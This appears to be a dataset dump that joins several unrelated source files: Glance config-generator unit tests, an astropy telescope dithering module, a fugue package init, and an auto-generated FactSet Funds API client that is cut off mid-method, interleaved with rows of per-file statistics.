    def test_multi_sample_gen(self, main, isfile, isdir):
        # Two config files: four isfile answers, two per file.
        isfile.side_effect = [False, True, False, True]
        isdir.return_value = True
        multiple_configs = [('glance-api-gen.conf', 'glance-api'),
                            ('glance-reg-gen.conf', 'glance-reg')]
        config = mock.Mock(config_generator_config_file=multiple_configs)
        app = mock.Mock(srcdir='/opt/glance', config=config)
        sphinxconfiggen.generate_sample(app)
        # One generator invocation per (config file, basename) pair.
        self.assertEqual(main.call_count, 2)
        main.assert_any_call(args=['--config-file',
                                   '/opt/glance/glance-api-gen.conf',
                                   '--output-file',
                                   '/opt/glance/glance-api.conf.sample'])
        main.assert_any_call(args=['--config-file',
                                   '/opt/glance/glance-reg-gen.conf',
                                   '--output-file',
                                   '/opt/glance/glance-reg.conf.sample'])

    @mock.patch('os.path.isdir')
    @mock.patch('os.path.isfile')
    @mock.patch('oslo_config.generator.main')
    def test_multi_sample_gen_with_without_one_base(self, main, isfile, isdir):
        isfile.side_effect = [False, True, False, True]
        isdir.return_value = True
        # Second entry has no basename: its output name derives from the
        # generator config filename instead.
        multiple_configs = [('glance-api-gen.conf', 'glance-api'),
                            ('glance-reg-gen.conf', None)]
        config = mock.Mock(config_generator_config_file=multiple_configs)
        app = mock.Mock(srcdir='/opt/glance', config=config)
        sphinxconfiggen.generate_sample(app)
        self.assertEqual(main.call_count, 2)
        main.assert_any_call(args=['--config-file',
                                   '/opt/glance/glance-api-gen.conf',
                                   '--output-file',
                                   '/opt/glance/glance-api.conf.sample'])
        main.assert_any_call(args=['--config-file',
                                   '/opt/glance/glance-reg-gen.conf',
                                   '--output-file',
                                   '/opt/glance/glance-reg-gen.conf.sample'])

    @mock.patch('os.path.isdir')
    @mock.patch('os.path.isfile')
    @mock.patch('oslo_config.generator.main')
    def test_multi_sample_gen_with_without_any_base(self, main, isfile, isdir):
        isfile.side_effect = [False, True, False, True]
        isdir.return_value = True
        # No basenames at all: both outputs derive from the config filenames.
        multiple_configs = [('glance-api-gen.conf', None),
                            ('glance-reg-gen.conf', None)]
        config = mock.Mock(config_generator_config_file=multiple_configs)
        app = mock.Mock(srcdir='/opt/glance', config=config)
        sphinxconfiggen.generate_sample(app)
        self.assertEqual(main.call_count, 2)
        main.assert_any_call(args=['--config-file',
                                   '/opt/glance/glance-api-gen.conf',
                                   '--output-file',
                                   '/opt/glance/glance-api-gen.conf.sample'])
        main.assert_any_call(args=['--config-file',
                                   '/opt/glance/glance-reg-gen.conf',
                                   '--output-file',
                                   '/opt/glance/glance-reg-gen.conf.sample'])
| 45.015504
| 79
| 0.558981
| 639
| 5,807
| 4.926448
| 0.179969
| 0.042249
| 0.049555
| 0.072427
| 0.808132
| 0.808132
| 0.808132
| 0.807179
| 0.807179
| 0.807179
| 0
| 0.001772
| 0.319614
| 5,807
| 128
| 80
| 45.367188
| 0.794989
| 0.094024
| 0
| 0.789474
| 0
| 0
| 0.227793
| 0.11952
| 0
| 0
| 0
| 0
| 0.115789
| 1
| 0.052632
| false
| 0
| 0.031579
| 0
| 0.105263
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
395bc3065f12457f08d18b94a2d602a0788bc67b
| 146
|
py
|
Python
|
fugue/extensions/outputter/__init__.py
|
WangCHX/fugue
|
bb9758d23b0041d4ed00f6195f317d097a9dd683
|
[
"Apache-2.0"
] | null | null | null |
fugue/extensions/outputter/__init__.py
|
WangCHX/fugue
|
bb9758d23b0041d4ed00f6195f317d097a9dd683
|
[
"Apache-2.0"
] | null | null | null |
fugue/extensions/outputter/__init__.py
|
WangCHX/fugue
|
bb9758d23b0041d4ed00f6195f317d097a9dd683
|
[
"Apache-2.0"
] | null | null | null |
# flake8: noqa
from fugue.extensions.outputter.outputter import Outputter
from fugue.extensions.outputter.convert import outputter, _to_outputter
| 36.5
| 71
| 0.856164
| 18
| 146
| 6.833333
| 0.5
| 0.146341
| 0.308943
| 0.455285
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.007463
| 0.082192
| 146
| 3
| 72
| 48.666667
| 0.910448
| 0.082192
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
39be593249dc7069fd70849c65b2b5ba3aa91f91
| 6,409
|
py
|
Python
|
random_dither.py
|
AstroHuntsman/signal-to-noise
|
231d9e73bdfbcd761630cdfcf675dfa8278aac1f
|
[
"MIT"
] | null | null | null |
random_dither.py
|
AstroHuntsman/signal-to-noise
|
231d9e73bdfbcd761630cdfcf675dfa8278aac1f
|
[
"MIT"
] | null | null | null |
random_dither.py
|
AstroHuntsman/signal-to-noise
|
231d9e73bdfbcd761630cdfcf675dfa8278aac1f
|
[
"MIT"
] | 1
|
2016-12-08T05:04:27.000Z
|
2016-12-08T05:04:27.000Z
|
# coding: utf-8
# # LOOPING DICE-9
# In[1]:
import numpy as np
import astropy.units as u
from astropy.coordinates import SkyCoord
import itertools
import math
import random
import matplotlib.pyplot as plt
def dither_dice9(ra_dec, pattern_offset, random_offset=0 * u.arcsec, loop=9, plot=False):
    """Dither around a position using the DICE-9 (3x3 square) pattern.

    Eight points are placed on a square around the central coordinate, and
    every pattern point is then jittered by a random offset inside a small
    box so that no pointing is ever selected twice.

    Args:
        ra_dec (SkyCoord): the central RA/Dec position.
        pattern_offset (float or Quantity): how far around the point to
            dither; bare floats are interpreted as arcseconds.
        random_offset (float or Quantity, optional): size of the random
            jitter box around each pattern point. Default is 0*u.arcsec.
        loop (int, optional): how many pointings to produce with the DICE-9
            pattern. Default is 9.
        plot (bool, optional): when True, plot the resulting coordinates.
            Default is False (no plot).

    Returns:
        SkyCoord: the list of jittered pointing coordinates.
    """
    if not isinstance(pattern_offset, u.Quantity):
        pattern_offset = pattern_offset * u.arcsec
    if not isinstance(random_offset, u.Quantity):
        random_offset = random_offset * u.arcsec

    ra = ra_dec.ra
    dec = ra_dec.dec
    repeats = math.ceil(loop / 9.0)

    # 0.5*2**0.5 is the adjacent side of a right-angle triangle (cos 45 deg);
    # the RA step is stretched by 1/cos(dec) to stay metric on the sky.
    half_step = ((0.5 * 2 ** 0.5) * pattern_offset) * 0.5
    step_ra = half_step / (np.cos(dec))
    jitter_ra = (random_offset * 0.5) / (np.cos(dec))
    jitter_dec = random_offset * 0.5

    # Sign multipliers for the eight outer points (starting upper-right,
    # walking the square) followed by a return to the centre.
    cycle = [(1, 1), (1, 0), (1, -1), (0, -1),
             (-1, -1), (-1, 0), (-1, 1), (0, 1), (0, 0)]
    RA_list = [ra]
    DEC_list = [dec]
    for _ in range(repeats):
        for sgn_ra, sgn_dec in cycle:
            RA_list.append(ra + sgn_ra * step_ra)
            DEC_list.append(dec + sgn_dec * half_step)
    RA_final_list = RA_list[:loop]
    DEC_final_list = DEC_list[:loop]

    # Jitter each pattern point uniformly inside its random box
    # (RA draw first, then DEC, per point).
    LISTra = []
    LISTdec = []
    for ra_i, dec_i in zip(RA_final_list, DEC_final_list):
        LISTra.append(random.uniform(ra_i - jitter_ra, ra_i + jitter_ra))
        LISTdec.append(random.uniform(dec_i - jitter_dec, dec_i + jitter_dec))

    All = SkyCoord(LISTra, LISTdec)
    if plot is True:
        plt.plot(All.ra, All.dec, 'c-s')
        plt.ylabel('Declination [deg]')
        plt.xlabel('Right Ascension [deg]')
        plt.show()
    return All
# # LOOPING DICE-5
# In[2]:
def dither_dice5(ra_dec, pattern_offset, random_offset=0 * u.arcsec, loop=5, plot=False):
    """Dither around a position using the DICE-5 (2x2 corners) pattern.

    Four points are placed on the corners of a square around the central
    coordinate, and every pattern point is then jittered by a random offset
    inside a small box so that no pointing is ever selected twice.

    Args:
        ra_dec (SkyCoord): the central RA/Dec position.
        pattern_offset (float or Quantity): how far around the point to
            dither; bare floats are interpreted as arcseconds.
        random_offset (float or Quantity, optional): size of the random
            jitter box around each pattern point. Default is 0*u.arcsec.
        loop (int, optional): how many pointings to produce with the DICE-5
            pattern. Default is 5.
        plot (bool, optional): when True, plot the resulting coordinates.
            Default is False (no plot).

    Returns:
        SkyCoord: the list of jittered pointing coordinates.
    """
    if not isinstance(pattern_offset, u.Quantity):
        pattern_offset = pattern_offset * u.arcsec
    if not isinstance(random_offset, u.Quantity):
        random_offset = random_offset * u.arcsec

    ra = ra_dec.ra
    dec = ra_dec.dec
    repeats = math.ceil(loop / 5.0)

    # 0.5*2**0.5 is the adjacent side of a right-angle triangle (cos 45 deg);
    # the RA step is stretched by 1/cos(dec) to stay metric on the sky.
    half_step = ((0.5 * 2 ** 0.5) * pattern_offset) * 0.5
    step_ra = half_step / (np.cos(dec))
    jitter_ra = (random_offset * 0.5) / (np.cos(dec))
    jitter_dec = random_offset * 0.5

    # Sign multipliers for the four corners followed by a return to centre.
    cycle = [(1, 1), (1, -1), (-1, -1), (-1, 1), (0, 0)]
    RA_list = [ra]
    DEC_list = [dec]
    for _ in range(repeats):
        for sgn_ra, sgn_dec in cycle:
            RA_list.append(ra + sgn_ra * step_ra)
            DEC_list.append(dec + sgn_dec * half_step)
    RA_final_list = RA_list[:loop]
    DEC_final_list = DEC_list[:loop]

    # Jitter each pattern point uniformly inside its random box
    # (RA draw first, then DEC, per point).
    LISTra = []
    LISTdec = []
    for ra_i, dec_i in zip(RA_final_list, DEC_final_list):
        LISTra.append(random.uniform(ra_i - jitter_ra, ra_i + jitter_ra))
        LISTdec.append(random.uniform(dec_i - jitter_dec, dec_i + jitter_dec))

    All = SkyCoord(LISTra, LISTdec)
    if plot is True:
        plt.plot(All.ra, All.dec, 'c-s')
        plt.ylabel('Declination [deg]')
        plt.xlabel('Right Ascension [deg]')
        plt.show()
    return All
| 34.643243
| 147
| 0.633796
| 966
| 6,409
| 4.064182
| 0.146998
| 0.071319
| 0.042792
| 0.033113
| 0.896587
| 0.861946
| 0.838512
| 0.82272
| 0.82272
| 0.82272
| 0
| 0.024778
| 0.263224
| 6,409
| 184
| 148
| 34.831522
| 0.80665
| 0.317366
| 0
| 0.735043
| 0
| 0
| 0.019281
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.017094
| false
| 0
| 0.059829
| 0
| 0.094017
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
39bf9e9535a3f026d3642f900545af7b569bfe93
| 154,972
|
py
|
Python
|
code/python/FundsAPIforDigitalPortals/v2/fds/sdk/FundsAPIforDigitalPortals/api/fund_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 6
|
2022-02-07T16:34:18.000Z
|
2022-03-30T08:04:57.000Z
|
code/python/FundsAPIforDigitalPortals/v2/fds/sdk/FundsAPIforDigitalPortals/api/fund_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | 2
|
2022-02-07T05:25:57.000Z
|
2022-03-07T14:18:04.000Z
|
code/python/FundsAPIforDigitalPortals/v2/fds/sdk/FundsAPIforDigitalPortals/api/fund_api.py
|
factset/enterprise-sdk
|
3fd4d1360756c515c9737a0c9a992c7451d7de7e
|
[
"Apache-2.0"
] | null | null | null |
"""
Funds API For Digital Portals
Search for mutual funds and ETFs using one single consolidated API, including a criteria-based screener. The API provides also base data, key figures, and holdings. A separate endpoint returns the possible values and value range for the parameters that the endpoint /fund/notation/screener/search accepts: Application developers can request the values and value range only for a restricted set of notations that match predefined parameters. This functionality may be used to pre-fill the values and value ranges of the parameters of the /fund/notation/screener/search endpoint so that performing a search always leads to a non-empty set of notations. This API is fully integrated with the corresponding Quotes API, allowing access to detailed price and performance information of instruments, as well as basic security identifier cross-reference. For direct access to price histories, please refer to the Time Series API for Digital Portals. Similar criteria based screener APIs exist for equity instruments and securitized derivatives: See the Stocks API and the Securitized Derivatives API for details. # noqa: E501
The version of the OpenAPI document: 2
Generated by: https://openapi-generator.tech
"""
import re # noqa: F401
import sys # noqa: F401
from multiprocessing.pool import ApplyResult
import typing
from fds.sdk.FundsAPIforDigitalPortals.api_client import ApiClient, Endpoint as _Endpoint
from fds.sdk.FundsAPIforDigitalPortals.model_utils import ( # noqa: F401
check_allowed_values,
check_validations,
date,
datetime,
file_type,
none_type,
validate_and_convert_types
)
from fds.sdk.FundsAPIforDigitalPortals.exceptions import ApiException
from fds.sdk.FundsAPIforDigitalPortals.model.inline_object import InlineObject
from fds.sdk.FundsAPIforDigitalPortals.model.inline_object1 import InlineObject1
from fds.sdk.FundsAPIforDigitalPortals.model.inline_object2 import InlineObject2
from fds.sdk.FundsAPIforDigitalPortals.model.inline_response200 import InlineResponse200
from fds.sdk.FundsAPIforDigitalPortals.model.inline_response2001 import InlineResponse2001
from fds.sdk.FundsAPIforDigitalPortals.model.inline_response2002 import InlineResponse2002
from fds.sdk.FundsAPIforDigitalPortals.model.inline_response2003 import InlineResponse2003
from fds.sdk.FundsAPIforDigitalPortals.model.inline_response2004 import InlineResponse2004
from fds.sdk.FundsAPIforDigitalPortals.model.inline_response2005 import InlineResponse2005
from fds.sdk.FundsAPIforDigitalPortals.model.inline_response2006 import InlineResponse2006
class FundApi(object):
"""NOTE: This class is auto generated by OpenAPI Generator
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
def __init__(self, api_client=None):
    """Build the FundApi and declare every endpoint it exposes.

    The generated original repeated the same endpoint dictionary nine
    times; the six keyFigures/benchmark GET endpoints and the three
    JSON-body POST endpoints are identical except for a handful of
    values, so they are built by two local helpers.

    Args:
        api_client (ApiClient, optional): client used to perform the HTTP
            requests. A default ApiClient is constructed when omitted.
    """
    if api_client is None:
        api_client = ApiClient()
    self.api_client = api_client

    def _benchmark_endpoint(period, response_cls):
        # One of the six keyFigures/benchmark GET endpoints. They differ
        # only in the URL period segment (e.g. 'month/1') and the
        # response model class; every other setting is identical.
        op_suffix = period.replace('/', '_')
        return _Endpoint(
            settings={
                'response_type': (
                    {200: (response_cls,), },
                    None
                ),
                'auth': [
                    'FactSetApiKey',
                    'FactSetOAuth2'
                ],
                'endpoint_path': '/fund/notation/keyFigures/benchmark/' + period + '/get',
                'operation_id': 'get_fund_notation_key_figures_benchmark_' + op_suffix + '_get',
                'http_method': 'GET',
                'servers': None,
            },
            params_map={
                'all': [
                    'id',
                    'id_notation_benchmark',
                    'attributes',
                    'language',
                ],
                'required': [
                    'id',
                    'id_notation_benchmark',
                ],
                'nullable': [],
                'enum': [],
                'validation': [
                    'id_notation_benchmark',
                    'attributes',
                    'language',
                ]
            },
            root_map={
                'validations': {
                    ('id_notation_benchmark',): {
                        'max_items': 100,
                        'min_items': 1,
                    },
                    ('attributes',): {
                        'max_items': 50,
                    },
                    ('language',): {
                        'max_length': 2,
                        'min_length': 2,
                    },
                },
                'allowed_values': {},
                'openapi_types': {
                    'id': (str,),
                    'id_notation_benchmark': ([str],),
                    'attributes': ([str],),
                    'language': (str,),
                },
                'attribute_map': {
                    'id': 'id',
                    'id_notation_benchmark': 'idNotationBenchmark',
                    'attributes': '_attributes',
                    'language': '_language',
                },
                'location_map': {
                    'id': 'query',
                    'id_notation_benchmark': 'query',
                    'attributes': 'query',
                    'language': 'query',
                },
                'collection_format_map': {
                    'id_notation_benchmark': 'csv',
                    'attributes': 'csv',
                }
            },
            headers_map={
                'accept': ['application/json'],
                'content_type': [],
            },
            api_client=api_client
        )

    def _post_body_endpoint(path, operation_id, body_cls, response_cls):
        # POST endpoints that accept one optional JSON body parameter and
        # return JSON; no query parameters, no validations.
        return _Endpoint(
            settings={
                'response_type': (
                    {200: (response_cls,), },
                    None
                ),
                'auth': [
                    'FactSetApiKey',
                    'FactSetOAuth2'
                ],
                'endpoint_path': path,
                'operation_id': operation_id,
                'http_method': 'POST',
                'servers': None,
            },
            params_map={
                'all': ['body'],
                'required': [],
                'nullable': [],
                'enum': [],
                'validation': []
            },
            root_map={
                'validations': {},
                'allowed_values': {},
                'openapi_types': {
                    'body': (body_cls,),
                },
                'attribute_map': {},
                'location_map': {
                    'body': 'body',
                },
                'collection_format_map': {}
            },
            headers_map={
                'accept': ['application/json'],
                'content_type': ['application/json']
            },
            api_client=api_client
        )

    # GET /fund/holding/listByInstrument -- unique parameter layout
    # (sortable, with an enumerated 'sort' attribute set).
    self.get_fund_holding_list_by_instrument_endpoint = _Endpoint(
        settings={
            'response_type': (
                {200: (InlineResponse200,), },
                None
            ),
            'auth': [
                'FactSetApiKey',
                'FactSetOAuth2'
            ],
            'endpoint_path': '/fund/holding/listByInstrument',
            'operation_id': 'get_fund_holding_list_by_instrument',
            'http_method': 'GET',
            'servers': None,
        },
        params_map={
            'all': [
                'id',
                'attributes',
                'sort',
            ],
            'required': [
                'id',
            ],
            'nullable': [],
            'enum': [
                'sort',
            ],
            'validation': [
                'attributes',
                'sort',
            ]
        },
        root_map={
            'validations': {
                ('attributes',): {
                    'max_items': 50,
                },
                ('sort',): {
                    'max_items': 2,
                },
            },
            'allowed_values': {
                ('sort',): {
                    "HOLDINGS.NAME": "holdings.name",
                    "-HOLDINGS.NAME": "-holdings.name",
                    "HOLDINGS.WEIGHT": "holdings.weight",
                    "-HOLDINGS.WEIGHT": "-holdings.weight"
                },
            },
            'openapi_types': {
                'id': (str,),
                'attributes': ([str],),
                'sort': ([str],),
            },
            'attribute_map': {
                'id': 'id',
                'attributes': '_attributes',
                'sort': '_sort',
            },
            'location_map': {
                'id': 'query',
                'attributes': 'query',
                'sort': 'query',
            },
            'collection_format_map': {
                'attributes': 'csv',
                'sort': 'csv',
            }
        },
        headers_map={
            'accept': ['application/json'],
            'content_type': [],
        },
        api_client=api_client
    )

    # The six benchmark key-figure endpoints, identical except for the
    # time-range path segment and (for week/1) the response model.
    self.get_fund_notation_key_figures_benchmark_month_1_get_endpoint = \
        _benchmark_endpoint('month/1', InlineResponse2002)
    self.get_fund_notation_key_figures_benchmark_month_3_get_endpoint = \
        _benchmark_endpoint('month/3', InlineResponse2002)
    self.get_fund_notation_key_figures_benchmark_week_1_get_endpoint = \
        _benchmark_endpoint('week/1', InlineResponse2003)
    self.get_fund_notation_key_figures_benchmark_year_1_get_endpoint = \
        _benchmark_endpoint('year/1', InlineResponse2002)
    self.get_fund_notation_key_figures_benchmark_year_3_get_endpoint = \
        _benchmark_endpoint('year/3', InlineResponse2002)
    self.get_fund_notation_key_figures_benchmark_year_5_get_endpoint = \
        _benchmark_endpoint('year/5', InlineResponse2002)

    # GET /fund/shareClass/get -- unique parameter layout (no sort,
    # language-validated).
    self.get_fund_share_class_get_endpoint = _Endpoint(
        settings={
            'response_type': (
                {200: (InlineResponse2006,), },
                None
            ),
            'auth': [
                'FactSetApiKey',
                'FactSetOAuth2'
            ],
            'endpoint_path': '/fund/shareClass/get',
            'operation_id': 'get_fund_share_class_get',
            'http_method': 'GET',
            'servers': None,
        },
        params_map={
            'all': [
                'id',
                'attributes',
                'language',
            ],
            'required': [
                'id',
            ],
            'nullable': [],
            'enum': [],
            'validation': [
                'attributes',
                'language',
            ]
        },
        root_map={
            'validations': {
                ('attributes',): {
                    'max_items': 50,
                },
                ('language',): {
                    'max_length': 2,
                    'min_length': 2,
                },
            },
            'allowed_values': {},
            'openapi_types': {
                'id': (str,),
                'attributes': ([str],),
                'language': (str,),
            },
            'attribute_map': {
                'id': 'id',
                'attributes': '_attributes',
                'language': '_language',
            },
            'location_map': {
                'id': 'query',
                'attributes': 'query',
                'language': 'query',
            },
            'collection_format_map': {
                'attributes': 'csv',
            }
        },
        headers_map={
            'accept': ['application/json'],
            'content_type': [],
        },
        api_client=api_client
    )

    # The three JSON-body POST endpoints.
    self.post_fund_issuer_search_endpoint = _post_body_endpoint(
        '/fund/issuer/search',
        'post_fund_issuer_search',
        InlineObject, InlineResponse2001)
    self.post_fund_notation_screener_search_endpoint = _post_body_endpoint(
        '/fund/notation/screener/search',
        'post_fund_notation_screener_search',
        InlineObject1, InlineResponse2004)
    self.post_fund_notation_screener_value_ranges_get_endpoint = _post_body_endpoint(
        '/fund/notation/screener/valueRanges/get',
        'post_fund_notation_screener_value_ranges_get',
        InlineObject2, InlineResponse2005)
@staticmethod
def apply_kwargs_defaults(kwargs, return_http_data_only, async_req):
kwargs["async_req"] = async_req
kwargs["_return_http_data_only"] = return_http_data_only
kwargs["_preload_content"] = kwargs.get("_preload_content", True)
kwargs["_request_timeout"] = kwargs.get("_request_timeout", None)
kwargs["_check_input_type"] = kwargs.get("_check_input_type", True)
kwargs["_check_return_type"] = kwargs.get("_check_return_type", True)
kwargs["_spec_property_naming"] = kwargs.get("_spec_property_naming", False)
kwargs["_content_type"] = kwargs.get("_content_type")
kwargs["_host_index"] = kwargs.get("_host_index")
def get_fund_holding_list_by_instrument(
    self,
    id,
    **kwargs
) -> InlineResponse200:
    """Holdings of a fund. # noqa: E501

    Only the top 10 holdings with regard to their weighting in the fund
    portfolio are returned, so the weights do not add up to 1 (i.e. 100%).
    Synchronous HTTP request; returns the HTTP data only.

    Args:
        id (str): Identifier of an instrument of a fund share class.

    Keyword Args:
        attributes ([str]): Limit the attributes returned in the response
            to the specified set. [optional]
        sort ([str]): Sortable attributes; prefix with a minus sign for
            descending order; at most 2 entries. [optional] If omitted the
            server uses ["-holdings.weight"].
        _preload_content (bool): if False, return the urllib3.HTTPResponse
            object without reading/decoding response data. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server.
            Default True.
        _check_return_type (bool): type-check data received from the
            server. Default True.
        _spec_property_naming (bool): True if input variable names are
            serialized (OpenAPI document) names rather than pythonic
            snake-case names. Default False.
        _content_type (str/None): force body content-type; None means it is
            predicted from allowed content-types and body. Default None.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.

    Returns:
        InlineResponse200: the response object.
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
    kwargs['id'] = id
    return self.get_fund_holding_list_by_instrument_endpoint.call_with_http_info(**kwargs)
def get_fund_holding_list_by_instrument_with_http_info(
    self,
    id,
    **kwargs
) -> typing.Tuple[InlineResponse200, int, typing.MutableMapping]:
    """Holdings of a fund. # noqa: E501

    Only the top 10 holdings with regard to their weighting in the fund
    portfolio are returned, so the weights do not add up to 1 (i.e. 100%).
    Synchronous HTTP request; returns the HTTP data, HTTP status code, and
    response headers.

    Args:
        id (str): Identifier of an instrument of a fund share class.

    Keyword Args:
        attributes ([str]): Limit the attributes returned in the response
            to the specified set. [optional]
        sort ([str]): Sortable attributes; prefix with a minus sign for
            descending order; at most 2 entries. [optional] If omitted the
            server uses ["-holdings.weight"].
        _preload_content (bool): if False, return the urllib3.HTTPResponse
            object without reading/decoding response data. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server.
            Default True.
        _check_return_type (bool): type-check data received from the
            server. Default True.
        _spec_property_naming (bool): True if input variable names are
            serialized (OpenAPI document) names rather than pythonic
            snake-case names. Default False.
        _content_type (str/None): force body content-type; None means it is
            predicted from allowed content-types and body. Default None.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.

    Returns:
        tuple: (InlineResponse200 response object, int HTTP status code,
            dict of response headers).
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
    kwargs['id'] = id
    return self.get_fund_holding_list_by_instrument_endpoint.call_with_http_info(**kwargs)
def get_fund_holding_list_by_instrument_async(
    self,
    id,
    **kwargs
) -> "ApplyResult[InlineResponse200]":
    """Holdings of a fund. # noqa: E501

    Only the top 10 holdings with regard to their weighting in the fund
    portfolio are returned, so the weights do not add up to 1 (i.e. 100%).
    Asynchronous HTTP request; returns the HTTP data wrapped in an
    ApplyResult.

    Args:
        id (str): Identifier of an instrument of a fund share class.

    Keyword Args:
        attributes ([str]): Limit the attributes returned in the response
            to the specified set. [optional]
        sort ([str]): Sortable attributes; prefix with a minus sign for
            descending order; at most 2 entries. [optional] If omitted the
            server uses ["-holdings.weight"].
        _preload_content (bool): if False, return the urllib3.HTTPResponse
            object without reading/decoding response data. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server.
            Default True.
        _check_return_type (bool): type-check data received from the
            server. Default True.
        _spec_property_naming (bool): True if input variable names are
            serialized (OpenAPI document) names rather than pythonic
            snake-case names. Default False.
        _content_type (str/None): force body content-type; None means it is
            predicted from allowed content-types and body. Default None.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.

    Returns:
        ApplyResult[InlineResponse200]
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=True)
    kwargs['id'] = id
    return self.get_fund_holding_list_by_instrument_endpoint.call_with_http_info(**kwargs)
def get_fund_holding_list_by_instrument_with_http_info_async(
    self,
    id,
    **kwargs
) -> "ApplyResult[typing.Tuple[InlineResponse200, int, typing.MutableMapping]]":
    """Holdings of a fund. # noqa: E501

    Only the top 10 holdings with regard to their weighting in the fund
    portfolio are returned, so the weights do not add up to 1 (i.e. 100%).
    Asynchronous HTTP request; returns HTTP data, HTTP status, and headers,
    wrapped in an ApplyResult.

    Args:
        id (str): Identifier of an instrument of a fund share class.

    Keyword Args:
        attributes ([str]): Limit the attributes returned in the response
            to the specified set. [optional]
        sort ([str]): Sortable attributes; prefix with a minus sign for
            descending order; at most 2 entries. [optional] If omitted the
            server uses ["-holdings.weight"].
        _preload_content (bool): if False, return the urllib3.HTTPResponse
            object without reading/decoding response data. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) pair. Default None.
        _check_input_type (bool): type-check data sent to the server.
            Default True.
        _check_return_type (bool): type-check data received from the
            server. Default True.
        _spec_property_naming (bool): True if input variable names are
            serialized (OpenAPI document) names rather than pythonic
            snake-case names. Default False.
        _content_type (str/None): force body content-type; None means it is
            predicted from allowed content-types and body. Default None.
        _host_index (int/None): index of the server to use. Default is
            read from the configuration.

    Returns:
        ApplyResult[(InlineResponse200, int, typing.Dict)]
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=True)
    kwargs['id'] = id
    return self.get_fund_holding_list_by_instrument_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_month_1_get(self, id, id_notation_benchmark, **kwargs) -> InlineResponse2002:
    """End-of-day (EOD) benchmark key figures of a fund for the time range of one month.  # noqa: E501

    Performs a synchronous HTTP request and returns only the response data.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Restrict the attributes returned in the
            response to the given set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        _preload_content (bool): when False, the raw urllib3.HTTPResponse
            is returned without reading/decoding the body. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default None.
        _check_input_type (bool): type-check the data sent to the server.
            Default True.
        _check_return_type (bool): type-check the data received from the
            server. Default True.
        _spec_property_naming (bool): True when the input variable names
            are the serialized names from the OpenAPI document; False
            (the default) for pythonic snake_case names.
        _content_type (str/None): force the body content type; when None
            it is predicted from the allowed content types and the body.
        _host_index (int/None): index of the server to use; by default
            read from the configuration.

    Returns:
        InlineResponse2002: the response object.
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=True, async_req=False)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
    return self.get_fund_notation_key_figures_benchmark_month_1_get_endpoint.call_with_http_info(**kwargs)
def get_fund_notation_key_figures_benchmark_month_1_get_with_http_info(self, id, id_notation_benchmark, **kwargs) -> typing.Tuple[InlineResponse2002, int, typing.MutableMapping]:
    """End-of-day (EOD) benchmark key figures of a fund for the time range of one month.  # noqa: E501

    Performs a synchronous HTTP request and returns the response data,
    the HTTP status code and the response headers.

    Args:
        id (str): Identifier of the notation.
        id_notation_benchmark ([str]): List of benchmark notations.

    Keyword Args:
        attributes ([str]): Restrict the attributes returned in the
            response to the given set. [optional]
        language (str): ISO 639-1 code of the language. [optional]
        _preload_content (bool): when False, the raw urllib3.HTTPResponse
            is returned without reading/decoding the body. Default True.
        _request_timeout (int/float/tuple): total request timeout, or a
            (connection, read) timeout pair. Default None.
        _check_input_type (bool): type-check the data sent to the server.
            Default True.
        _check_return_type (bool): type-check the data received from the
            server. Default True.
        _spec_property_naming (bool): True when the input variable names
            are the serialized names from the OpenAPI document; False
            (the default) for pythonic snake_case names.
        _content_type (str/None): force the body content type; when None
            it is predicted from the allowed content types and the body.
        _host_index (int/None): index of the server to use; by default
            read from the configuration.

    Returns:
        InlineResponse2002: the response object.
        int: the HTTP status code.
        dict: the response headers.
    """
    self.apply_kwargs_defaults(kwargs=kwargs, return_http_data_only=False, async_req=False)
    kwargs.update(id=id, id_notation_benchmark=id_notation_benchmark)
